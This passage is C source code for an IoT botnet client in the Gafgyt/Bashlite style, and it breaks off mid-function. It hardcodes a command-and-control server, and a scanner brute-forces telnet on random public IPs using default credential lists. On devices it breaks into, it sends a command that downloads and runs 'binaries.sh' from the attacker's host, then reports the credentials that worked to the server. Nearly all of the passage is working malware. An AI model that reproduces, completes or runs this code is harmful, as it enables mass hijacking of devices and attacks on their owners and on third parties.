// #define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *

1.  
2.  
3. //
4.  
5. #define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
6. #define PAD_RIGHT 1
7. #define PAD_ZERO 2
8. #define PRINT_BUF_LEN 12
9. #define CMD_IAC 255
10. #define CMD_WILL 251
11. #define CMD_WONT 252
12. #define CMD_DO 253
13. #define CMD_DONT 254
14. #define OPT_SGA 3
15.  
16. //
17.  
18. #include <stdlib.h>
19. #include <stdarg.h>
20. #include <stdio.h>
21. #include <sys/socket.h>
22. #include <sys/types.h>
23. #include <netinet/in.h>
24. #include <arpa/inet.h>
25. #include <netdb.h>
26. #include <signal.h>
27. #include <strings.h>
28. #include <string.h>
29. #include <sys/utsname.h>
30. #include <unistd.h>
31. #include <fcntl.h>
32. #include <errno.h>
33. #include <netinet/ip.h>
34. #include <netinet/udp.h>
35. #include <netinet/tcp.h>
36. #include <sys/wait.h>
37. #include <sys/ioctl.h>
38. #include <net/if.h>
39.  
40.  
41.  
42. unsigned char *commServer[] =
43. {
44. "185.141.24.50:23"
45. };
46.  
47.  
48. int initConnection();
49. int getBogos(unsigned char *bogomips);
50. int getCores();
51. int getCountry(unsigned char *buf, int bufsize);
52. void makeRandomStr(unsigned char *buf, int length);
53. int sockprintf(int sock, char *formatStr, ...);
54. char *inet_ntoa(struct in_addr in);
55.  
56.  
57.  
58. int mainCommSock = 0, currentServer = -1, gotIP = 0;
59. uint32_t *pids;
60. uint32_t scanPid;
61. uint64_t numpids = 0;
62. struct in_addr ourIP;
63. unsigned char macAddress[6] = {0};
64. char *usernames[] = {"root\0", "\0", "admin\0", "user\0", "login\0", "ubnt\0", "guest\0"};
65. char *passwords[] = {"root\0", "\0", "admin\0", "user\0", "login\0", "changeme\0", "ubnt\0", "guest\0"};
66.  
67.  
68.  
69. #define PHI 0x9e3779b9
70. static uint32_t Q[4096], c = 362436;
71.  
72. void init_rand(uint32_t x)
73. {
74. int i;
75.  
76. Q[0] = x;
77. Q[1] = x + PHI;
78. Q[2] = x + PHI + PHI;
79.  
80. for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
81. }
82.  
83. uint32_t rand_cmwc(void)
84. {
85. uint64_t t, a = 18782LL;
86. static uint32_t i = 4095;
87. uint32_t x, r = 0xfffffffe;
88. i = (i + 1) & 4095;
89. t = a * Q[i] + c;
90. c = (uint32_t)(t >> 32);
91. x = t + c;
92. if (x < c) {
93. x++;
94. c++;
95. }
96. return (Q[i] = r - x);
97. }
98.  
99.  
100.  
101. void trim(char *str)
102. {
103. int i;
104. int begin = 0;
105. int end = strlen(str) - 1;
106.  
107. while (isspace(str[begin])) begin++;
108.  
109. while ((end >= begin) && isspace(str[end])) end--;
110. for (i = begin; i <= end; i++) str[i - begin] = str[i];
111.  
112. str[i - begin] = '\0';
113. }
114.  
115. static void printchar(unsigned char **str, int c)
116. {
117. if (str) {
118. **str = c;
119. ++(*str);
120. }
121. else (void)write(1, &c, 1);
122. }
123.  
124. static int prints(unsigned char **out, const unsigned char *string, int width, int pad)
125. {
126. register int pc = 0, padchar = ' ';
127.  
128. if (width > 0) {
129. register int len = 0;
130. register const unsigned char *ptr;
131. for (ptr = string; *ptr; ++ptr) ++len;
132. if (len >= width) width = 0;
133. else width -= len;
134. if (pad & PAD_ZERO) padchar = '0';
135. }
136. if (!(pad & PAD_RIGHT)) {
137. for ( ; width > 0; --width) {
138. printchar (out, padchar);
139. ++pc;
140. }
141. }
142. for ( ; *string ; ++string) {
143. printchar (out, *string);
144. ++pc;
145. }
146. for ( ; width > 0; --width) {
147. printchar (out, padchar);
148. ++pc;
149. }
150.  
151. return pc;
152. }
153.  
154. static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase)
155. {
156. unsigned char print_buf[PRINT_BUF_LEN];
157. register unsigned char *s;
158. register int t, neg = 0, pc = 0;
159. register unsigned int u = i;
160.  
161. if (i == 0) {
162. print_buf[0] = '0';
163. print_buf[1] = '\0';
164. return prints (out, print_buf, width, pad);
165. }
166.  
167. if (sg && b == 10 && i < 0) {
168. neg = 1;
169. u = -i;
170. }
171.  
172. s = print_buf + PRINT_BUF_LEN-1;
173. *s = '\0';
174.  
175. while (u) {
176. t = u % b;
177. if( t >= 10 )
178. t += letbase - '0' - 10;
179. *--s = t + '0';
180. u /= b;
181. }
182.  
183. if (neg) {
184. if( width && (pad & PAD_ZERO) ) {
185. printchar (out, '-');
186. ++pc;
187. --width;
188. }
189. else {
190. *--s = '-';
191. }
192. }
193.  
194. return pc + prints (out, s, width, pad);
195. }
196.  
197. static int print(unsigned char **out, const unsigned char *format, va_list args )
198. {
199. register int width, pad;
200. register int pc = 0;
201. unsigned char scr[2];
202.  
203. for (; *format != 0; ++format) {
204. if (*format == '%') {
205. ++format;
206. width = pad = 0;
207. if (*format == '\0') break;
208. if (*format == '%') goto out;
209. if (*format == '-') {
210. ++format;
211. pad = PAD_RIGHT;
212. }
213. while (*format == '0') {
214. ++format;
215. pad |= PAD_ZERO;
216. }
217. for ( ; *format >= '0' && *format <= '9'; ++format) {
218. width *= 10;
219. width += *format - '0';
220. }
221. if( *format == 's' ) {
222. register char *s = (char *)va_arg( args, int );
223. pc += prints (out, s?s:"(null)", width, pad);
224. continue;
225. }
226. if( *format == 'd' ) {
227. pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
228. continue;
229. }
230. if( *format == 'x' ) {
231. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
232. continue;
233. }
234. if( *format == 'X' ) {
235. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
236. continue;
237. }
238. if( *format == 'u' ) {
239. pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
240. continue;
241. }
242. if( *format == 'c' ) {
243. scr[0] = (unsigned char)va_arg( args, int );
244. scr[1] = '\0';
245. pc += prints (out, scr, width, pad);
246. continue;
247. }
248. }
249. else {
250. out:
251. printchar (out, *format);
252. ++pc;
253. }
254. }
255. if (out) **out = '\0';
256. va_end( args );
257. return pc;
258. }
259.  
260. int zprintf(const unsigned char *format, ...)
261. {
262. va_list args;
263. va_start( args, format );
264. return print( 0, format, args );
265. }
266.  
267. int szprintf(unsigned char *out, const unsigned char *format, ...)
268. {
269. va_list args;
270. va_start( args, format );
271. return print( &out, format, args );
272. }
273.  
274.  
275. int sockprintf(int sock, char *formatStr, ...)
276. {
277. unsigned char *textBuffer = malloc(2048);
278. memset(textBuffer, 0, 2048);
279. char *orig = textBuffer;
280. va_list args;
281. va_start(args, formatStr);
282. print(&textBuffer, formatStr, args);
283. va_end(args);
284. orig[strlen(orig)] = '\n';
285. zprintf("buf: %s\n", orig);
286. int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
287. free(orig);
288. return q;
289. }
290.  
291. static int *fdopen_pids;
292.  
293. int fdpopen(unsigned char *program, register unsigned char *type)
294. {
295. register int iop;
296. int pdes[2], fds, pid;
297.  
298. if (*type != 'r' && *type != 'w' || type[1]) return -1;
299.  
300. if (pipe(pdes) < 0) return -1;
301. if (fdopen_pids == NULL) {
302. if ((fds = getdtablesize()) <= 0) return -1;
303. if ((fdopen_pids = (int *)malloc((unsigned int)(fds * sizeof(int)))) == NULL) return -1;
304. memset((unsigned char *)fdopen_pids, 0, fds * sizeof(int));
305. }
306.  
307. switch (pid = vfork())
308. {
309. case -1:
310. close(pdes[0]);
311. close(pdes[1]);
312. return -1;
313. case 0:
314. if (*type == 'r') {
315. if (pdes[1] != 1) {
316. dup2(pdes[1], 1);
317. close(pdes[1]);
318. }
319. close(pdes[0]);
320. } else {
321. if (pdes[0] != 0) {
322. (void) dup2(pdes[0], 0);
323. (void) close(pdes[0]);
324. }
325. (void) close(pdes[1]);
326. }
327. execl("/bin/sh", "sh", "-c", program, NULL);
328. _exit(127);
329. }
330. if (*type == 'r') {
331. iop = pdes[0];
332. (void) close(pdes[1]);
333. } else {
334. iop = pdes[1];
335. (void) close(pdes[0]);
336. }
337. fdopen_pids[iop] = pid;
338. return (iop);
339. }
340.  
341. int fdpclose(int iop)
342. {
343. register int fdes;
344. sigset_t omask, nmask;
345. int pstat;
346. register int pid;
347.  
348. if (fdopen_pids == NULL || fdopen_pids[iop] == 0) return (-1);
349. (void) close(iop);
350. sigemptyset(&nmask);
351. sigaddset(&nmask, SIGINT);
352. sigaddset(&nmask, SIGQUIT);
353. sigaddset(&nmask, SIGHUP);
354. (void) sigprocmask(SIG_BLOCK, &nmask, &omask);
355. do {
356. pid = waitpid(fdopen_pids[iop], (int *) &pstat, 0);
357. } while (pid == -1 && errno == EINTR);
358. (void) sigprocmask(SIG_SETMASK, &omask, NULL);
359. fdopen_pids[fdes] = 0;
360. return (pid == -1 ? -1 : WEXITSTATUS(pstat));
361. }
362.  
363. unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd)
364. {
365. int got = 1, total = 0;
366. while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
367. return got == 0 ? NULL : buffer;
368. }
369.  
370. static const long hextable[] = {
371. [0 ... 255] = -1,
372. ['0'] = 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
373. ['A'] = 10, 11, 12, 13, 14, 15,
374. ['a'] = 10, 11, 12, 13, 14, 15
375. };
376.  
377. long parseHex(unsigned char *hex)
378. {
379. long ret = 0;
380. while (*hex && ret >= 0) ret = (ret << 4) | hextable[*hex++];
381. return ret;
382. }
383.  
384. int wildString(const unsigned char* pattern, const unsigned char* string) {
385. switch(*pattern)
386. {
387. case '\0': return *string;
388. case '*': return !(!wildString(pattern+1, string) || *string && !wildString(pattern, string+1));
389. case '?': return !(*string && !wildString(pattern+1, string+1));
390. default: return !((toupper(*pattern) == toupper(*string)) && !wildString(pattern+1, string+1));
391. }
392. }
393.  
394. int getHost(unsigned char *toGet, struct in_addr *i)
395. {
396. struct hostent *h;
397. if((i->s_addr = inet_addr(toGet)) == -1) return 1;
398. return 0;
399. }
400.  
401. void uppercase(unsigned char *str)
402. {
403. while(*str) { *str = toupper(*str); str++; }
404. }
405.  
406. int getBogos(unsigned char *bogomips)
407. {
408. int cmdline = open("/proc/cpuinfo", O_RDONLY);
409. char linebuf[4096];
410. while(fdgets(linebuf, 4096, cmdline) != NULL)
411. {
412. uppercase(linebuf);
413. if(strstr(linebuf, "BOGOMIPS") == linebuf)
414. {
415. unsigned char *pos = linebuf + 8;
416. while(*pos == ' ' || *pos == '\t' || *pos == ':') pos++;
417. while(pos[strlen(pos)-1] == '\r' || pos[strlen(pos)-1] == '\n') pos[strlen(pos)-1]=0;
418. if(strchr(pos, '.') != NULL) *strchr(pos, '.') = 0x00;
419. strcpy(bogomips, pos);
420. close(cmdline);
421. return 0;
422. }
423. memset(linebuf, 0, 4096);
424. }
425. close(cmdline);
426. return 1;
427. }
428.  
429. int getCores()
430. {
431. int totalcores = 0;
432. int cmdline = open("/proc/cpuinfo", O_RDONLY);
433. char linebuf[4096];
434. while(fdgets(linebuf, 4096, cmdline) != NULL)
435. {
436. uppercase(linebuf);
437. if(strstr(linebuf, "BOGOMIPS") == linebuf) totalcores++;
438. memset(linebuf, 0, 4096);
439. }
440. close(cmdline);
441. return totalcores;
442.  
443. }
444.  
445. void makeRandomStr(unsigned char *buf, int length)
446. {
447. int i = 0;
448. for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
449. }
450.  
451. int recvLine(int socket, unsigned char *buf, int bufsize)
452. {
453. memset(buf, 0, bufsize);
454.  
455. fd_set myset;
456. struct timeval tv;
457. tv.tv_sec = 30;
458. tv.tv_usec = 0;
459. FD_ZERO(&myset);
460. FD_SET(socket, &myset);
461. int selectRtn, retryCount;
462. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
463. while(retryCount < 10)
464. {
465. sockprintf(mainCommSock, "PING");
466.  
467. tv.tv_sec = 30;
468. tv.tv_usec = 0;
469. FD_ZERO(&myset);
470. FD_SET(socket, &myset);
471. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
472. retryCount++;
473. continue;
474. }
475.  
476. break;
477. }
478. }
479.  
480. unsigned char tmpchr;
481. unsigned char *cp;
482. int count = 0;
483.  
484. cp = buf;
485. while(bufsize-- > 1)
486. {
487. if(recv(mainCommSock, &tmpchr, 1, 0) != 1) {
488. *cp = 0x00;
489. return -1;
490. }
491. *cp++ = tmpchr;
492. if(tmpchr == '\n') break;
493. count++;
494. }
495. *cp = 0x00;
496.  
497. zprintf("recv: %s\n", cp);
498.  
499. return count;
500. }
501.  
502. int connectTimeout(int fd, char *host, int port, int timeout)
503. {
504. struct sockaddr_in dest_addr;
505. fd_set myset;
506. struct timeval tv;
507. socklen_t lon;
508.  
509. int valopt;
510. long arg = fcntl(fd, F_GETFL, NULL);
511. arg |= O_NONBLOCK;
512. fcntl(fd, F_SETFL, arg);
513.  
514. dest_addr.sin_family = AF_INET;
515. dest_addr.sin_port = htons(port);
516. if(getHost(host, &dest_addr.sin_addr)) return 0;
517. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
518. int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
519.  
520. if (res < 0) {
521. if (errno == EINPROGRESS) {
522. tv.tv_sec = timeout;
523. tv.tv_usec = 0;
524. FD_ZERO(&myset);
525. FD_SET(fd, &myset);
526. if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
527. lon = sizeof(int);
528. getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
529. if (valopt) return 0;
530. }
531. else return 0;
532. }
533. else return 0;
534. }
535.  
536. arg = fcntl(fd, F_GETFL, NULL);
537. arg &= (~O_NONBLOCK);
538. fcntl(fd, F_SETFL, arg);
539.  
540. return 1;
541. }
542.  
543. int listFork()
544. {
545. uint32_t parent, *newpids, i;
546. parent = fork();
547. if (parent <= 0) return parent;
548. numpids++;
549. newpids = (uint32_t*)malloc((numpids + 1) * 4);
550. for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
551. newpids[numpids - 1] = parent;
552. free(pids);
553. pids = newpids;
554. return parent;
555. }
556.  
557. int negotiate(int sock, unsigned char *buf, int len)
558. {
559. unsigned char c;
560.  
561. switch (buf[1]) {
562. case CMD_IAC: /*dropped an extra 0xFF wh00ps*/ return 0;
563. case CMD_WILL:
564. case CMD_WONT:
565. case CMD_DO:
566. case CMD_DONT:
567. c = CMD_IAC;
568. send(sock, &c, 1, MSG_NOSIGNAL);
569. if (CMD_WONT == buf[1]) c = CMD_DONT;
570. else if (CMD_DONT == buf[1]) c = CMD_WONT;
571. else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
572. else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
573. send(sock, &c, 1, MSG_NOSIGNAL);
574. send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
575. break;
576.  
577. default:
578. break;
579. }
580.  
581. return 0;
582. }
583.  
584. int matchPrompt(char *bufStr)
585. {
586. char *prompts = ":>%$#\0";
587.  
588. int bufLen = strlen(bufStr);
589. int i, q = 0;
590. for(i = 0; i < strlen(prompts); i++)
591. {
592. while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
593. if(*(bufStr + bufLen - q) == prompts[i]) return 1;
594. }
595.  
596. return 0;
597. }
598.  
599. int readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex)
600. {
601. int bufferUsed = initialIndex, got = 0, found = 0;
602. fd_set myset;
603. struct timeval tv;
604. tv.tv_sec = timeout;
605. tv.tv_usec = timeoutusec;
606. unsigned char *initialRead = NULL;
607.  
608. while(bufferUsed + 2 < bufSize && (tv.tv_sec > 0 || tv.tv_usec > 0))
609. {
610. FD_ZERO(&myset);
611. FD_SET(fd, &myset);
612. if (select(fd+1, &myset, NULL, NULL, &tv) < 1) break;
613. initialRead = buffer + bufferUsed;
614. got = recv(fd, initialRead, 1, 0);
615. if(got == -1 || got == 0) return 0;
616. bufferUsed += got;
617. if(*initialRead == 0xFF)
618. {
619. got = recv(fd, initialRead + 1, 2, 0);
620. if(got == -1 || got == 0) return 0;
621. bufferUsed += got;
622. if(!negotiate(fd, initialRead, 3)) return 0;
623. } else {
624. if(strstr(buffer, toFind) != NULL || (matchLePrompt && matchPrompt(buffer))) { found = 1; break; }
625. }
626. }
627.  
628. if(found) return 1;
629. return 0;
630. }
631.  
632.  
633.  
634. static uint8_t ipState[5] = {0}; //starting from 1 becuz yolo
635. in_addr_t getRandomPublicIP()
636. {
637. if(ipState[1] > 0 && ipState[4] < 255)
638. {
639. ipState[4]++;
640. char ip[16] = {0};
641. szprintf(ip, "%d.%d.%d.%d", ipState[1], ipState[2], ipState[3], ipState[4]);
642. return inet_addr(ip);
643. }
644.  
645. ipState[1] = rand() % 255;
646. ipState[2] = rand() % 255;
647. ipState[3] = rand() % 255;
648. ipState[4] = 0;
649. while(
650. (ipState[1] == 0) ||
651. (ipState[1] == 10) ||
652. (ipState[1] == 100 && (ipState[2] >= 64 && ipState[2] <= 127)) ||
653. (ipState[1] == 127) ||
654. (ipState[1] == 169 && ipState[2] == 254) ||
655. (ipState[1] == 172 && (ipState[2] <= 16 && ipState[2] <= 31)) ||
656. (ipState[1] == 192 && ipState[2] == 0 && ipState[3] == 2) ||
657. (ipState[1] == 192 && ipState[2] == 88 && ipState[3] == 99) ||
658. (ipState[1] == 192 && ipState[2] == 168) ||
659. (ipState[1] == 198 && (ipState[2] == 18 || ipState[2] == 19)) ||
660. (ipState[1] == 198 && ipState[2] == 51 && ipState[3] == 100) ||
661. (ipState[1] == 203 && ipState[2] == 0 && ipState[3] == 113) ||
662. (ipState[1] >= 224)
663. )
664. {
665. ipState[1] = rand() % 255;
666. ipState[2] = rand() % 255;
667. ipState[3] = rand() % 255;
668. }
669.  
670. char ip[16] = {0};
671. szprintf(ip, "%d.%d.%d.0", ipState[1], ipState[2], ipState[3]);
672. return inet_addr(ip);
673. }
674.  
675. in_addr_t getRandomIP(in_addr_t netmask)
676. {
677. in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
678. return tmp ^ ( rand_cmwc() & ~netmask);
679. }
680.  
681. unsigned short csum (unsigned short *buf, int count)
682. {
683. register uint64_t sum = 0;
684. while( count > 1 ) { sum += *buf++; count -= 2; }
685. if(count > 0) { sum += *(unsigned char *)buf; }
686. while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
687. return (uint16_t)(~sum);
688. }
689.  
690. unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph)
691. {
692.  
693. struct tcp_pseudo
694. {
695. unsigned long src_addr;
696. unsigned long dst_addr;
697. unsigned char zero;
698. unsigned char proto;
699. unsigned short length;
700. } pseudohead;
701. unsigned short total_len = iph->tot_len;
702. pseudohead.src_addr=iph->saddr;
703. pseudohead.dst_addr=iph->daddr;
704. pseudohead.zero=0;
705. pseudohead.proto=IPPROTO_TCP;
706. pseudohead.length=htons(sizeof(struct tcphdr));
707. int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
708. unsigned short *tcp = malloc(totaltcp_len);
709. memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
710. memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
711. unsigned short output = csum(tcp,totaltcp_len);
712. free(tcp);
713. return output;
714. }
715.  
716. void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize)
717. {
718. iph->ihl = 5;
719. iph->version = 4;
720. iph->tos = 0;
721. iph->tot_len = sizeof(struct iphdr) + packetSize;
722. iph->id = rand_cmwc();
723. iph->frag_off = 0;
724. iph->ttl = MAXTTL;
725. iph->protocol = protocol;
726. iph->check = 0;
727. iph->saddr = source;
728. iph->daddr = dest;
729. }
730.  
731. int sclose(int fd)
732. {
733. if(3 > fd) return 1;
734. close(fd);
735. return 0;
736. }
737.  
738.  
739.  
740. void StartTheLelz()
741. {
742. int max = (getdtablesize() / 4) * 3, i, res;
743. fd_set myset;
744. struct timeval tv;
745. socklen_t lon;
746. int valopt;
747.  
748. max = max > 512 ? 512 : max;
749.  
750. struct sockaddr_in dest_addr;
751. dest_addr.sin_family = AF_INET;
752. dest_addr.sin_port = htons(23);
753. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
754.  
755. struct telstate_t
756. {
757. int fd;
758. uint32_t ip;
759. uint8_t state;
760. uint8_t complete;
761. uint8_t usernameInd;
762. uint8_t passwordInd;
763. uint32_t totalTimeout;
764. uint16_t bufUsed;
765. char *sockbuf;
766. } fds[max];
767. memset(fds, 0, max * (sizeof(int) + 1));
768. for(i = 0; i < max; i++) { fds[i].complete = 1; fds[i].sockbuf = malloc(1024); memset(fds[i].sockbuf, 0, 1024); }
769.  
770. while(1)
771. {
772. for(i = 0; i < max; i++)
773. {
774. switch(fds[i].state)
775. {
776. case 0:
777. {
778. memset(fds[i].sockbuf, 0, 1024);
779.  
780. if(fds[i].complete) { char *tmp = fds[i].sockbuf; memset(&(fds[i]), 0, sizeof(struct telstate_t)); fds[i].sockbuf = tmp; fds[i].ip = getRandomPublicIP(); }
781. else {
782. fds[i].passwordInd++;
783. if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *)) { fds[i].passwordInd = 0; fds[i].usernameInd++; }
784. if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *)) { fds[i].complete = 1; continue; }
785. }
786. dest_addr.sin_family = AF_INET;
787. dest_addr.sin_port = htons(23);
788. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
789. dest_addr.sin_addr.s_addr = fds[i].ip;
790. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
791. if(fds[i].fd == -1) { continue; }
792. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
793. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) { sclose(fds[i].fd); fds[i].complete = 1; }
794. else { fds[i].state = 1; fds[i].totalTimeout = 0; }
795. }
796. break;
797.  
798. case 1:
799. {
800. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
801.  
802. FD_ZERO(&myset);
803. FD_SET(fds[i].fd, &myset);
804. tv.tv_sec = 0;
805. tv.tv_usec = 10000;
806. res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);
807. if(res == 1)
808. {
809. lon = sizeof(int);
810. valopt = 0;
811. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
812. if(valopt)
813. {
814. sclose(fds[i].fd);
815. fds[i].state = 0;
816. fds[i].complete = 1;
817. } else {
818. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
819. fds[i].totalTimeout = 0;
820. fds[i].bufUsed = 0;
821. memset(fds[i].sockbuf, 0, 1024);
822. fds[i].state = 2;
823. continue;
824. }
825. } else if(res == -1)
826. {
827. sclose(fds[i].fd);
828. fds[i].state = 0;
829. fds[i].complete = 1;
830. }
831.  
832. if(fds[i].totalTimeout + 10 < time(NULL))
833. {
834. sclose(fds[i].fd);
835. fds[i].state = 0;
836. fds[i].complete = 1;
837. }
838. }
839. break;
840.  
841. case 2:
842. {
843. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
844.  
845. if(readUntil(fds[i].fd, "ogin:", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
846. {
847. fds[i].totalTimeout = 0;
848. fds[i].bufUsed = 0;
849. memset(fds[i].sockbuf, 0, 1024);
850. fds[i].state = 3;
851. continue;
852. } else {
853. fds[i].bufUsed = strlen(fds[i].sockbuf);
854. }
855.  
856. if(fds[i].totalTimeout + 30 < time(NULL))
857. {
858. sclose(fds[i].fd);
859. fds[i].state = 0;
860. fds[i].complete = 1;
861. }
862. }
863. break;
864.  
865. case 3:
866. {
867. if(send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
868. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
869. fds[i].state = 4;
870. }
871. break;
872.  
873. case 4:
874. {
875. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
876.  
877. if(readUntil(fds[i].fd, "assword:", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
878. {
879. fds[i].totalTimeout = 0;
880. fds[i].bufUsed = 0;
881. if(strstr(fds[i].sockbuf, "assword:") != NULL) fds[i].state = 5;
882. else fds[i].state = 100;
883. memset(fds[i].sockbuf, 0, 1024);
884. continue;
885. } else {
886. if(strstr(fds[i].sockbuf, "ncorrect") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
887. fds[i].bufUsed = strlen(fds[i].sockbuf);
888. }
889.  
890. if(fds[i].totalTimeout + 30 < time(NULL))
891. {
892. sclose(fds[i].fd);
893. fds[i].state = 0;
894. fds[i].complete = 1;
895. }
896. }
897. break;
898.  
899. case 5:
900. {
901. if(send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
902. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
903. fds[i].state = 6;
904. }
905. break;
906.  
907. case 6:
908. {
909. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
910.  
911. if(readUntil(fds[i].fd, "ncorrect", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
912. {
913. fds[i].totalTimeout = 0;
914. fds[i].bufUsed = 0;
915. if(strstr(fds[i].sockbuf, "ncorrect") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
916. if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
917. else fds[i].state = 7;
918. memset(fds[i].sockbuf, 0, 1024);
919. continue;
920. } else {
921. fds[i].bufUsed = strlen(fds[i].sockbuf);
922. }
923.  
924. if(fds[i].totalTimeout + 30 < time(NULL))
925. {
926. sclose(fds[i].fd);
927. fds[i].state = 0;
928. fds[i].complete = 1;
929. }
930. }
931. break;
932.  
933. case 7:
934. {
935. if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
936. fds[i].state = 8;
937. }
938. break;
939.  
940. case 8:
941. {
942. if(send(fds[i].fd, "cd /tmp && wget http://185.141.24.50/binaries.sh && chmod +x binaries.sh && sh binaries.sh && rm -f binaries.sh\r\n", 143, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
943. fds[i].state = 9;
944. }
945. break;
946.  
947. case 9:
948. {
949. if(send(fds[i].fd, "/bin/busybox;echo -e '\\147\\141\\171\\146\\147\\164'\r\n", 49, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
950. fds[i].state = 10;
951. }
952. break;
953.  
954. case 10:
955. {
956. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
957.  
958. if(readUntil(fds[i].fd, "gayfgt", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
959. {
960. fds[i].totalTimeout = 0;
961. fds[i].bufUsed = 0;
962. if(strstr(fds[i].sockbuf, "multi-call") != NULL) sockprintf(mainCommSock, "REPORT %s:%s:%s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
963. memset(fds[i].sockbuf, 0, 1024);
964. sclose(fds[i].fd);
965. fds[i].complete = 1;
966. //fds[i].lastWorked = 1;
967. fds[i].state = 0;
968. continue;
969. } else {
970. fds[i].bufUsed = strlen(fds[i].sockbuf);
971. }
972.  
973. if(fds[i].totalTimeout + 30 < time(NULL))
974. {
975. sclose(fds[i].fd);
976. fds[i].state = 0;
977. fds[i].complete = 1;
978. }
979. }
980. break;
981.  
982. case 100:
983. {
984. if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
985. fds[i].state = 101;
986. }
987. break;
988.  
989. case 101:
990. {
991. if(send(fds[i].fd, "cd /tmp && wget http://185.141.24.50/binaries.sh && chmod +x binaries.sh && sh binaries.sh && rm -f binaries.sh\r\n", 143, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
992. fds[i].state = 102;
993. }
994. break;
995.  
996.  
997. case 102:
998. {
